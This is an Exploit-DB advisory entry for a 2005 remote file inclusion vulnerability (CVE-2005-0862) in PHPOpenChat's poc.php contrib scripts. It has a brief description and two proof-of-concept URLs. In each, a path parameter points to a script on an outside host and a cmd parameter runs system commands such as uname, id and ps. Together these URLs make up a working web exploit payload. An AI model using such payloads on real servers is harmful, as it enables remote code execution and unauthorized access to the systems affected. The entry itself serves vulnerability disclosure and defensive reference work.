PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion

2005-03-15T00:00:00
ID EDB-ID:25228
Type exploitdb
Reporter Albania Security Clan
Modified 2005-03-15T00:00:00

Description

PHPOpenChat 2.3.4/3.0.1 poc.php Remote File Inclusion. CVE- 2005-0862 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/12817/info
 
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
 
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
 
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue. 

http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps